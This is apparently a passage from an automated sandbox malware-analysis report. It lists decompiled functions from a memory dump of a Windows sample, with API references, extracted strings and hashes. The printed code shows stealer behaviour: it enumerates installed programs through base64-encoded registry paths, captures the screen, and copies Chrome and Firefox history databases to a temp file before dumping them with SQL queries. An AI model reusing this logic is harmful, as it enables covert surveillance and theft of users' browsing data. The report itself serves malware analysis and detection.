				E00403BF4( &_v1116, 2);
				E00403508( &_v1108, 2);
				E00403BDC( &_v1100);
				E004034E4( &_v1096);
				E00403BF4( &_v1092, 4);
				E00403508( &_v1076, 3);
				E00403BDC( &_v1064);
				E004034E4( &_v1060);
				E00403BF4( &_v1056, 2);
				E00403508( &_v1048, 2);
				E00403BDC( &_v1040);
				E004034E4( &_v1036);
				E00403BF4( &_v1032, 4);
				return E004034E4( &_v1016);
			}

0x0041564d
0x0041564f
0x00415654
0x00415654
0x00415656
0x00415658
0x00415658
0x0041565e
0x00415660
0x00415668
0x00415669
0x0041566e
0x00415671
0x00415676
0x0041567b
0x00415693
0x004156a9
0x00415826
0x004156bb
0x004156c0
0x004156c6
0x004156ce
0x004156da
0x004156f2
0x004156fd
0x00415709
0x00415714
0x00415722
0x0041572d
0x0041572e
0x00415746
0x00415756
0x00415757
0x0041575c
0x00415762
0x00415767
0x0041576f
0x0041577b
0x00415793
0x0041579e
0x004157aa
0x004157b5
0x004157c3
0x004157ce
0x004157cf
0x004157e7
0x004157f7
0x004157f8
0x004157fd
0x00415803
0x00415813
0x00415820
0x00415825
0x00415825
0x0041583e
0x00415856
0x0041586c
0x004159e9
0x0041587e
0x00415883
0x00415889
0x00415891
0x0041589d
0x004158b5
0x004158c0
0x004158cc
0x004158d7
0x004158e5
0x004158f0
0x004158f1
0x00415909
0x00415919
0x0041591a
0x0041591f
0x00415925
0x0041592a
0x00415932
0x0041593e
0x00415956
0x00415961
0x0041596d
0x00415978
0x00415986
0x00415991
0x00415992
0x004159aa
0x004159ba
0x004159bb
0x004159c0
0x004159c6
0x004159d6
0x004159e3
0x004159e8
0x004159e8
0x00415a10
0x00415a25
0x00415a32
0x00415a46
0x00415a5b
0x00415a68
0x00415a6f
0x00415a72
0x00415a75
0x00415a85
0x00415a95
0x00415aa0
0x00415aab
0x00415abb
0x00415acb
0x00415ad6
0x00415ae1
0x00415af1
0x00415b01
0x00415b0c
0x00415b17
0x00415b27
0x00415b37
0x00415b42
0x00415b4d
0x00415b5d
0x00415b6d

APIs

RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A212,00000000,00415B6E,?,-00000001,?,?,00000000,00000000,?,00416BF5,00000001), ref: 004156A9
RegEnumKeyA.ADVAPI32(0041A212,00000000,?,000003E9), ref: 00415831
RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A212,0041A212,00000001,?,000003E9,),?,?,00000000,00415C44,?,?), ref: 0041586C
RegEnumKeyA.ADVAPI32(0041A212,00000000,?,000003E9), ref: 004159F4

Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA

Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07

Strings

(), xrefs: 00415A20
RGlzcGxheVZlcnNpb24=, xrefs: 00415776, 00415939
U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs, xrefs: 0041568E, 00415851
RGlzcGxheU5hbWU=, xrefs: 004156D5, 00415898
, xrefs: 00415A56
U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==, xrefs: 00415704, 004157A5, 004158C7, 00415968
), xrefs: 00415803, 004159C6

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnumFreeOpenString
String ID: $()$)$RGlzcGxheU5hbWU=$RGlzcGxheVZlcnNpb24=$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==
API String ID: 373517563-3013244427
Opcode ID: 8892950bb751b5d78bd6f273eaab46e4e0552f7128122a2ace435e765f63cac5
Instruction ID: c01df635abeadf6e6837e62572b2515f3de099e5a3d6091bc8c8e2951dea1457
Opcode Fuzzy Hash: 8892950bb751b5d78bd6f273eaab46e4e0552f7128122a2ace435e765f63cac5
Instruction Fuzzy Hash: 94C1F5B5A001189BCB11EB55CC41BCEB7BDAB84305F5045FBB608B7282DA78AF858F5D

Uniqueness

Uniqueness Score: -1.00%

Function 00402668, Relevance: 16.6, APIs: 9, Strings: 2, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402668(CHAR* __eax, intOrPtr* __edx) {
				char _t5;
				char _t6;
				CHAR* _t7;
				char _t9;
				CHAR* _t11;
				char _t14;
				CHAR* _t15;
				char _t17;
				CHAR* _t19;
				CHAR* _t22;
				CHAR* _t23;
				CHAR* _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;
				void* _t36;

				_t34 = __edx;
				_t22 = __eax;
				while(1) {
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L4:
					if( *_t22 != 0x22 || _t22[1] != 0x22) {
						_t36 = 0;
						_t32 = _t22;
						while(1) {
							_t6 =  *_t22;
							if(_t6 <= 0x20) {
								break;
							}
							if(_t6 != 0x22) {
								_t7 = CharNextA(_t22);
								_t36 = _t36 + _t7 - _t22;
								_t22 = _t7;
								continue;
							}
							_t22 = CharNextA(_t22);
							while(1) {
								_t9 =  *_t22;
								if(_t9 == 0 || _t9 == 0x22) {
									break;
								}
								_t11 = CharNextA(_t22);
								_t36 = _t36 + _t11 - _t22;
								_t22 = _t11;
							}
							if( *_t22 != 0) {
								_t22 = CharNextA(_t22);
							}
						}
						E00403B1C(_t34, _t36);
						_t23 = _t32;
						_t33 =  *_t34;
						_t35 = 0;
						while(1) {
							_t14 =  *_t23;
							if(_t14 <= 0x20) {
								break;
							}
							if(_t14 != 0x22) {
								_t15 = CharNextA(_t23);
								if(_t15 <= _t23) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t15 > _t23);
								continue;
							}
							_t23 = CharNextA(_t23);
							while(1) {
								_t17 =  *_t23;
								if(_t17 == 0 || _t17 == 0x22) {
									break;
								}
								_t19 = CharNextA(_t23);
								if(_t19 <= _t23) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t19 > _t23);
							}
							if( *_t23 != 0) {
								_t23 = CharNextA(_t23);
							}
						}
						return _t23;
					} else {
						_t22 =  &(_t22[2]);
						continue;
					}
				}
			}

0x0040266c
0x0040266e
0x0040267a
0x0040267a
0x0040267a
0x0040267e
0x00402678
0x00402678
0x0040267a
0x0040267a
0x0040267e
0x00402678
0x00402678
0x00402684
0x00402687
0x00402694
0x00402696
0x004026dd
0x004026dd
0x004026e1
0x00000000
0x00000000
0x0040269c
0x004026d0
0x004026d9
0x004026db
0x00000000
0x004026db
0x004026a4
0x004026b6
0x004026b6
0x004026ba
0x00000000
0x00000000
0x004026a9
0x004026b2
0x004026b4
0x004026b4
0x004026c3
0x004026cb
0x004026cb
0x004026c3
0x004026e7
0x004026ec
0x004026ee
0x004026f0
0x00402745
0x00402745
0x00402749
0x00000000
0x00000000
0x004026f6
0x00402731
0x00402738
0x00000000
0x00000000
0x00000000
0x00000000
0x0040273a
0x0040273a
0x0040273c
0x0040273f
0x00402740
0x00402741
0x00000000
0x0040273a
0x004026fe
0x00402717
0x00402717
0x0040271b
0x00000000
0x00000000
0x00402703
0x0040270a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040270c
0x0040270c
0x0040270e
0x00402711
0x00402712
0x00402713
0x0040270c
0x00402724
0x0040272c
0x0040272c
0x00402724
0x00402751
0x0040268f
0x0040268f
0x00000000
0x0040268f
0x00402687

APIs

CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195AF,?), ref: 0040269F
CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195AF,?), ref: 004026A9
CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195AF,?), ref: 004026C6
CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195AF,?), ref: 004026D0
CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195AF,?), ref: 004026F9
CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195AF,?), ref: 00402703
CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195AF,?), ref: 00402727
CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195AF,?), ref: 00402731

Strings

", xrefs: 00402684
", xrefs: 00402689

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CharNext
String ID: "$"
API String ID: 3213498283-3758156766
Opcode ID: c6d8730434dbc330e26cf7f014052777a241139f1a82d49c5bcfa5fb36d78824
Instruction ID: 06a23872e8460c007548b42de0442a537cd71877075bfb16317ebbd4e879d901
Opcode Fuzzy Hash: c6d8730434dbc330e26cf7f014052777a241139f1a82d49c5bcfa5fb36d78824
Instruction Fuzzy Hash: 2D21E7546043D51ADB31297A0AC877A7B894A5B304B68087BD0C1BB3D7D4FE4C8B832D

Uniqueness

Uniqueness Score: -1.00%

Function 00416FB0, Relevance: 15.2, APIs: 10, Instructions: 162
windowCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E00416FB0(int __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, char _a12, int _a16) {
				int _v8;
				int _v12;
				int _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _v32;
				struct HWND__* _v48;
				struct HWND__* _v52;
				struct HWND__* _v56;
				char _v60;
				intOrPtr _v124;
				char _v132;
				char _v148;
				char* _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				void* _v176;
				char _v180;
				intOrPtr* _t78;
				struct HDC__* _t100;
				intOrPtr _t107;
				void* _t112;
				void* _t114;
				struct HDC__* _t116;
				struct HDC__* _t118;
				void* _t121;

				_v28 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_push(_t121);
				_push(0x4171d7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t121 + 0xffffff50;
				if( *0x41cb04 != 0 &&  *0x41cb08 != 0 &&  *0x41cb0c != 0 &&  *0x41cb10 != 0 &&  *0x41cb14 != 0 &&  *0x41cb18 != 0 &&  *0x41cb1c != 0 &&  *0x41cb20 != 0 &&  *0x41cb24 != 0 &&  *0x41cb28 != 0) {
					_v60 = 1;
					_v56 = 0;
					_v52 = 0;
					_v48 = 0;
					_push(0);
					_push( &_v60);
					_push( &_v20);
					if( *0x41cb08() == 0) {
						_t100 = GetDC(0);
						_t116 = CreateCompatibleDC(0);
						_t112 = CreateCompatibleBitmap(_t100, _v8, _v12);
						SelectObject(_t116, _t112);
						BitBlt(_t116, 0, 0, _v8, _v12, _t100, _v16, _a16, 0xcc0020);
						 *0x41cb24(0, 0xffffffff, E0040495C( &_v28));
						 *0x41cb10(_t112, 0,  &_v24);
						E00416EDC(_a8, _t100,  &_v148, _t112, _t116);
						_v180 = 1;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t114 = _t112;
						_t118 = _t116;
						_v160 = 1;
						_v156 = 4;
						_v152 =  &_a12;
						 *0x41cb20(_v24, _v28,  &_v148,  &_v180);
						_t78 = _v28;
						 *((intOrPtr*)( *_t78 + 0x30))(_t78,  &_v132, 1);
						 *0x41cb28(_v28,  &_v32);
						GlobalFix(_v32);
						E004035D4(_a4, _v124, _v32);
						 *0x41cb1c(_v24);
						GlobalUnWire(_v32);
						DeleteObject(_t114);
						DeleteDC(_t118);
						ReleaseDC(0, _t100);
						 *0x41cb0c(_v20);
					}
				}
				_pop(_t107);
				 *[fs:eax] = _t107;
				_push(E004171DE);
				return E0040495C( &_v28);
			}

0x00416fbe
0x00416fc1
0x00416fc4
0x00416fc7
0x00416fcc
0x00416fcd
0x00416fd2
0x00416fd5
0x00416fdf
0x0041705a
0x00417061
0x00417068
0x0041706f
0x00417076
0x0041707b
0x0041707f
0x00417088
0x00417095
0x0041709e
0x004170ae
0x004170b2
0x004170d2
0x004170e4
0x004170f1
0x00417100
0x00417105
0x0041711c
0x0041711d
0x0041711e
0x0041711f
0x00417120
0x00417121
0x00417122
0x0041712c
0x00417139
0x00417155
0x00417161
0x00417167
0x00417172
0x0041717c
0x0041718b
0x00417194
0x0041719e
0x004171a4
0x004171aa
0x004171b2
0x004171bb
0x004171bb
0x00417088
0x004171c3
0x004171c6
0x004171c9
0x004171d6

APIs

GetDC.USER32(00000000), ref: 00417090
CreateCompatibleDC.GDI32(00000000), ref: 00417099
CreateCompatibleBitmap.GDI32(00000000,0041A212,?), ref: 004170A9
SelectObject.GDI32(00000000,00000000), ref: 004170B2
BitBlt.GDI32(00000000,00000000,00000000,0041A212,?,00000000,00000000,?,00CC0020), ref: 004170D2
GlobalFix.KERNEL32(?), ref: 0041717C
GlobalUnWire.KERNEL32(?), ref: 0041719E
DeleteObject.GDI32(00000000), ref: 004171A4
DeleteDC.GDI32(00000000), ref: 004171AA
ReleaseDC.USER32 ref: 004171B2

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CompatibleCreateDeleteGlobalObject$BitmapReleaseSelectWire
String ID:
API String ID: 914135935-0
Opcode ID: 75d1131f51ecb2d553ab7d8928f99ad89ba4083edd43a8eb5aad49789378265a
Instruction ID: ef45df128ede85129e0c4d5475d485c7d6030f40d18b36e8376d67ec69c327ad
Opcode Fuzzy Hash: 75d1131f51ecb2d553ab7d8928f99ad89ba4083edd43a8eb5aad49789378265a
Instruction Fuzzy Hash: BE51FDB1A44209AFDB11DF95EC85FEF7BBCAB48305F104066F604E62D1C7786984CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00412974, Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 222
fileCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E00412974(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				long _t73;
				WCHAR* _t86;
				intOrPtr* _t101;
				void* _t103;
				intOrPtr* _t105;
				intOrPtr* _t109;
				intOrPtr* _t138;
				void* _t140;
				intOrPtr* _t142;
				void* _t144;
				intOrPtr* _t152;
				intOrPtr* _t158;
				intOrPtr* _t164;
				void* _t166;
				void* _t178;
				intOrPtr _t198;
				intOrPtr _t200;
				intOrPtr _t213;
				intOrPtr _t217;
				intOrPtr _t218;
				void* _t219;
				void* _t220;

				_t215 = __esi;
				_t177 = __ebx;
				_t217 = _t218;
				_t178 = 0xb;
				do {
					_push(0);
					_push(0);
					_t178 = _t178 - 1;
					_t223 = _t178;
				} while (_t178 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = __eax;
				_t3 =  &_v8; // 0x6f747365
				E00404150(_t3);
				_push(_t217);
				_push(0x412c41);
				_push( *[fs:eax]);
				 *[fs:eax] = _t218;
				_t4 =  &_v28; // 0x6f747351
				E00403BDC(_t4);
				_push(_t217);
				_push(0x412bb7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t218;
				_t73 = GetTickCount();
				_t5 =  &_v60; // 0x6f747331
				E0040709C(_t73, __ebx, _t5, __esi, _t223);
				_push(_v60);
				_t7 =  &_v64; // 0x6f74732d
				E00406FDC(_t7, __ebx, __edi, __esi, _t223);
				_push(_v64);
				_push(L".tmp");
				E00403E78();
				_t10 =  &_v40; // 0x6f747345
				E004078D8(_v8, _t177, _t10, _t223);
				_t12 =  &_v72; // 0x6f747325
				E004062FC(L"%TEMP%", _t12, _t223);
				_push(_v72);
				_push(0x412c78);
				_push(_v32);
				E00403E78();
				_t17 =  &_v44; // 0x6f747341
				E004078D8(_v68, _t177, _t17, _t223);
				_t86 = E00403D98(_v44);
				CopyFileW(E00403D98(_v40), _t86, 0xffffffff);
				_t20 =  &_v76; // 0x6f747321
				E0040377C(_t20, _v44);
				_t23 =  &_v36; // 0x6f747349
				E00404B58(_v76, _t177, _t178, _t23, _t215, _t223);
				_t24 =  &_v80; // 0x6f74731d
				E00403D88(_t24, _v36);
				if(E0040776C(_v80, _t177, _t178) != 0) {
					_t101 =  *0x41b140; // 0x41ca20
					_t103 =  *((intOrPtr*)( *_t101))(E00403990(_v36),  &_v16);
					_t219 = _t218 + 8;
					__eflags = _t103;
					if(_t103 == 0) {
						_t138 =  *0x41b2d4; // 0x41ca28
						_t140 =  *((intOrPtr*)( *_t138))(_v16, "SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),\"unixepoch\") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By  visits.visit_time DESC LIMIT 0, 10000", 0xffffffff,  &_v20,  &_v24);
						_t220 = _t219 + 0x14;
						__eflags = _t140;
						if(_t140 == 0) {
							while(1) {
								_t142 =  *0x41b384; // 0x41ca2c
								_t144 =  *((intOrPtr*)( *_t142))(_v20);
								__eflags = _t144 - 0x64;
								if(_t144 != 0x64) {
									goto L9;
								}
								E004034E4( &_v48);
								E004034E4( &_v52);
								E004034E4( &_v56);
								_t152 =  *0x41b1dc; // 0x41ca30
								E004036DC( &_v48,  *((intOrPtr*)( *_t152))(_v20, 0));
								_t158 =  *0x41b1dc; // 0x41ca30
								E004036DC( &_v52,  *((intOrPtr*)( *_t158))(_v20, 1));
								_t164 =  *0x41b1dc; // 0x41ca30
								_t166 =  *((intOrPtr*)( *_t164))(_v20, 2);
								_t220 = _t220 + 0x18;
								E004036DC( &_v56, _t166);
								_push(_v28);
								_push(0x412d40);
								E00403D88( &_v84, _v48);
								_push(_v84);
								_push(0x412d48);
								E00403D88( &_v88, _v52);
								_push(_v88);
								_push(0x412d54);
								E00403D88( &_v92, _v56);
								_push(_v92);
								_push(L"\r\n\r\n");
								E00403E78();
							}
						}
					}
					L9:
					_t105 =  *0x41b46c; // 0x41ca38
					 *((intOrPtr*)( *_t105))(_v20);
					_t109 =  *0x41b20c; // 0x41ca24
					 *((intOrPtr*)( *_t109))(_v16);
					_pop(_t198);
					 *[fs:eax] = _t198;
					E00403C18(_v12, _v28);
					DeleteFileW(E00403D98(_v44));
				} else {
					_pop(_t213);
					 *[fs:eax] = _t213;
				}
				_pop(_t200);
				 *[fs:eax] = _t200;
				_push(E00412C48);
				_t58 =  &_v92; // 0x6f747311
				E00403BF4(_t58, 4);
				_t59 =  &_v76; // 0x6f747321
				E004034E4(_t59);
				_t60 =  &_v72; // 0x6f747325
				E00403BF4(_t60, 4);
				_t61 =  &_v56; // 0x6f747335
				E00403508(_t61, 3);
				_t62 =  &_v44; // 0x6f747341
				E00403BF4(_t62, 2);
				_t63 =  &_v36; // 0x6f747349
				E004034E4(_t63);
				_t64 =  &_v32; // 0x6f74734d
				E00403BF4(_t64, 2);
				_t65 =  &_v8; // 0x6f747365
				return E00403BDC(_t65);
			}

0x00412974
0x00412974
0x00412975
0x00412977
0x0041297c
0x0041297c
0x0041297e
0x00412980
0x00412980
0x00412980
0x00412983
0x00412984
0x00412985
0x00412986
0x00412989
0x0041298c
0x0041298f
0x00412996
0x00412997
0x0041299c
0x0041299f
0x004129a2
0x004129a5
0x004129ac
0x004129ad
0x004129b2
0x004129b5
0x004129b8
0x004129bd
0x004129c0
0x004129c5
0x004129c8
0x004129cb
0x004129d0
0x004129d3
0x004129e0
0x004129e5
0x004129eb
0x004129f0
0x004129f8
0x004129fd
0x00412a00
0x00412a05
0x00412a10
0x00412a18
0x00412a1b
0x00412a25
0x00412a34
0x00412a39
0x00412a3f
0x00412a47
0x00412a4a
0x00412a4f
0x00412a55
0x00412a64
0x00412a80
0x00412a87
0x00412a89
0x00412a8c
0x00412a8e
0x00412aa7
0x00412aae
0x00412ab0
0x00412ab3
0x00412ab5
0x00412b7a
0x00412b7e
0x00412b85
0x00412b88
0x00412b8b
0x00000000
0x00000000
0x00412ac3
0x00412acb
0x00412ad3
0x00412ade
0x00412aef
0x00412afa
0x00412b0b
0x00412b16
0x00412b1d
0x00412b1f
0x00412b27
0x00412b2c
0x00412b2f
0x00412b3a
0x00412b3f
0x00412b42
0x00412b4d
0x00412b52
0x00412b55
0x00412b60
0x00412b65
0x00412b68
0x00412b75
0x00412b75
0x00412b7a
0x00412ab5
0x00412b91
0x00412b95
0x00412b9c
0x00412ba3
0x00412baa
0x00412baf
0x00412bb2
0x00412bc7
0x00412bd5
0x00412a66
0x00412a68
0x00412a6b
0x00412a6b
0x00412bdc
0x00412bdf
0x00412be2
0x00412be7
0x00412bef
0x00412bf4
0x00412bf7
0x00412bfc
0x00412c04
0x00412c09
0x00412c11
0x00412c16
0x00412c1e
0x00412c23
0x00412c26
0x00412c2b
0x00412c33
0x00412c38
0x00412c40

APIs

GetTickCount.KERNEL32 ref: 004129B8
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412C78,?,.tmp,?,?,00000000,00412BB7,?,00000000,00412C41,?,00000000), ref: 00412A34
DeleteFileW.KERNEL32(00000000), ref: 00412BD5

Strings

SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000, xrefs: 00412A9E
.tmp, xrefs: 004129D3
%TEMP%, xrefs: 004129F3
, xrefs: 00412B68

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CopyCountDeleteTick
String ID: $%TEMP%$.tmp$SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000
API String ID: 2381671008-351388873
Opcode ID: 551d3d9a6a1bb4e856a4b43c992a77fd18843ed0a399b7e38e05dabe73914c23
Instruction ID: f70f4eb6c3a4d74226b28448a77a1ad81309a428455034dfd3705b2b32de383d
Opcode Fuzzy Hash: 551d3d9a6a1bb4e856a4b43c992a77fd18843ed0a399b7e38e05dabe73914c23
Instruction Fuzzy Hash: C7810B71A00109AFCB00EF95DD82EDEBBB8EF48305F504476F514F72A1DB78AA558B58

Uniqueness

Uniqueness Score: -1.00%

Function 0041253C, Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 222
fileCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E0041253C(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				WCHAR* _t86;
				intOrPtr* _t101;
				void* _t103;
				intOrPtr* _t105;
				intOrPtr* _t109;
				intOrPtr* _t138;
				void* _t140;
				intOrPtr* _t142;
				void* _t144;
				intOrPtr* _t152;
				intOrPtr* _t158;
				intOrPtr* _t164;
				void* _t166;
				void* _t178;
				intOrPtr _t198;
				intOrPtr _t200;
				intOrPtr _t213;
				intOrPtr _t217;
				intOrPtr _t218;
				void* _t219;
				void* _t220;

				_t215 = __esi;
				_t177 = __ebx;
				_t217 = _t218;
				_t178 = 0xb;
				do {
					_push(0);
					_push(0);
					_t178 = _t178 - 1;
					_t223 = _t178;
				} while (_t178 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = __eax;
				E00404150( &_v8);
				_push(_t217);
				_push(0x412809);
				_push( *[fs:eax]);
				 *[fs:eax] = _t218;
				E00403BDC( &_v28);
				_push(_t217);
				_push(0x41277f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t218;
				E0040709C(GetTickCount(), __ebx,  &_v60, __esi, _t223);
				_push(_v60);
				E00406FDC( &_v64, __ebx, __edi, __esi, _t223);
				_push(_v64);
				_push(L".tmp");
				E00403E78();
				E004078D8(_v8, _t177,  &_v40, _t223);
				E004062FC(L"%TEMP%",  &_v72, _t223);
				_push(_v72);
				_push(0x412840);
				_push(_v32);
				E00403E78();
				E004078D8(_v68, _t177,  &_v44, _t223);
				_t86 = E00403D98(_v44);
				CopyFileW(E00403D98(_v40), _t86, 0xffffffff);
				E0040377C( &_v76, _v44);
				E00404B58(_v76, _t177, _t178,  &_v36, _t215, _t223);
				E00403D88( &_v80, _v36);
				if(E0040776C(_v80, _t177, _t178) != 0) {
					_t101 =  *0x41b140; // 0x41ca20
					_t103 =  *((intOrPtr*)( *_t101))(E00403990(_v36),  &_v16);
					_t219 = _t218 + 8;
					__eflags = _t103;
					if(_t103 == 0) {
						_t138 =  *0x41b2d4; // 0x41ca28
						_t140 =  *((intOrPtr*)( *_t138))(_v16, "SELECT DATETIME(moz_historyvisits.visit_date/1000000, \"unixepoch\", \"localtime\"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000", 0xffffffff,  &_v20,  &_v24);
						_t220 = _t219 + 0x14;
						__eflags = _t140;
						if(_t140 == 0) {
							while(1) {
								_t142 =  *0x41b384; // 0x41ca2c
								_t144 =  *((intOrPtr*)( *_t142))(_v20);
								__eflags = _t144 - 0x64;
								if(_t144 != 0x64) {
									goto L9;
								}
								E004034E4( &_v48);
								E004034E4( &_v52);
								E004034E4( &_v56);
								_t152 =  *0x41b1dc; // 0x41ca30
								E004036DC( &_v48,  *((intOrPtr*)( *_t152))(_v20, 0));
								_t158 =  *0x41b1dc; // 0x41ca30
								E004036DC( &_v52,  *((intOrPtr*)( *_t158))(_v20, 1));
								_t164 =  *0x41b1dc; // 0x41ca30
								_t166 =  *((intOrPtr*)( *_t164))(_v20, 2);
								_t220 = _t220 + 0x18;
								E004036DC( &_v56, _t166);
								_push(_v28);
								_push(0x412948);
								E00403D88( &_v84, _v48);
								_push(_v84);
								_push(0x412950);
								E00403D88( &_v88, _v52);
								_push(_v88);
								_push(0x41295c);
								E00403D88( &_v92, _v56);
								_push(_v92);
								_push(L"\r\n\r\n");
								E00403E78();
							}
						}
					}
					L9:
					_t105 =  *0x41b46c; // 0x41ca38
					 *((intOrPtr*)( *_t105))(_v20);
					_t109 =  *0x41b20c; // 0x41ca24
					 *((intOrPtr*)( *_t109))(_v16);
					_pop(_t198);
					 *[fs:eax] = _t198;
					E00403C18(_v12, _v28);
					DeleteFileW(E00403D98(_v44));
				} else {
					_pop(_t213);
					 *[fs:eax] = _t213;
				}
				_pop(_t200);
				 *[fs:eax] = _t200;
				_push(E00412810);
				E00403BF4( &_v92, 4);
				E004034E4( &_v76);
				E00403BF4( &_v72, 4);
				E00403508( &_v56, 3);
				E00403BF4( &_v44, 2);
				E004034E4( &_v36);
				E00403BF4( &_v32, 2);
				return E00403BDC( &_v8);
			}

0x0041253c
0x0041253c
0x0041253d
0x0041253f
0x00412544
0x00412544
0x00412546
0x00412548
0x00412548
0x00412548
0x0041254b
0x0041254c
0x0041254d
0x0041254e
0x00412551
0x00412557
0x0041255e
0x0041255f
0x00412564
0x00412567
0x0041256d
0x00412574
0x00412575
0x0041257a
0x0041257d
0x00412588
0x0041258d
0x00412593
0x00412598
0x0041259b
0x004125a8
0x004125b3
0x004125c0
0x004125c5
0x004125c8
0x004125cd
0x004125d8
0x004125e3
0x004125ed
0x004125fc
0x00412607
0x00412612
0x0041261d
0x0041262c
0x00412648
0x0041264f
0x00412651
0x00412654
0x00412656
0x0041266f
0x00412676
0x00412678
0x0041267b
0x0041267d
0x00412742
0x00412746
0x0041274d
0x00412750
0x00412753
0x00000000
0x00000000
0x0041268b
0x00412693
0x0041269b
0x004126a6
0x004126b7
0x004126c2
0x004126d3
0x004126de
0x004126e5
0x004126e7
0x004126ef
0x004126f4
0x004126f7
0x00412702
0x00412707
0x0041270a
0x00412715
0x0041271a
0x0041271d
0x00412728
0x0041272d
0x00412730
0x0041273d
0x0041273d
0x00412742
0x0041267d
0x00412759
0x0041275d
0x00412764
0x0041276b
0x00412772
0x00412777
0x0041277a
0x0041278f
0x0041279d
0x0041262e
0x00412630
0x00412633
0x00412633
0x004127a4
0x004127a7
0x004127aa
0x004127b7
0x004127bf
0x004127cc
0x004127d9
0x004127e6
0x004127ee
0x004127fb
0x00412808

APIs

GetTickCount.KERNEL32 ref: 00412580
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412840,?,.tmp,?,?,00000000,0041277F,?,00000000,00412809,?,00000000), ref: 004125FC
DeleteFileW.KERNEL32(00000000), ref: 0041279D

Strings

%TEMP%, xrefs: 004125BB
